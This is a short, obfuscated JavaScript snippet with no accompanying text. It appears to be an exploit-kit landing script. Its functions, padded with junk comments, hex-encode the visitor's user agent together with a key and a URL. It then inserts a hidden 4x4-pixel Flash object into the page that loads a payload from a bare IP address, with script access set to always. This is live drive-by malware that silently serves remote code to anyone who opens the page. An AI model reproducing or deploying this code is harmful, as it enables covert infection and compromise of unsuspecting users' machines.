/*s4524d8342hssfj2711fs*/function hgfgerdfgdf(num, width){/*s3345d90587hfj86484fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s29003d48716hfj25347fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s69852d42287hfj43789fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s35647d40180hfj32966fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd15622hfs*/c += b + d;/*s92374d94377hfj97682fs*/e += 1;}return c;}/*s26137dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.76.249/?OTU4NDg0NzI=&rand=xX_QMvWebRXQCJ3EKvrcT6NEMVHRH0CL2Y-dmrHQefjaelWkzrLFTF_xozKASASG6_FtdfJSDQ&info=MTg3NzE5NzA=&elsa=rijBHWfAdhn99cAV8X9v-u3UDcm0SdhJGG_EfZZghG-cOUR7c82Vn2x7Mkcc0mxReF61ETi-hL&befe=NDgzNDI0NjU=", ghnvbn("http://188.225.76.249/?OTU0NTE5NzE=&elsa=on4wJBFgU96ut30CGzBSY1pWCrhSEMwgX-5CTELBpjF_yzLMSIcp0wReF7WBTxOstU1sR6QsbnK_7S6CJrg&info=MjA1OTcxODE=&rand=xHzQMrPYbR3FFYDfKPrEUKREMU7WA0eKwYyZhazVF5yxFDfGpbL1FxzspV-dCFyEmvFvdLAHIwKh1UTASwR&travel=NDY2MzkxNTc=","wexykukusw"));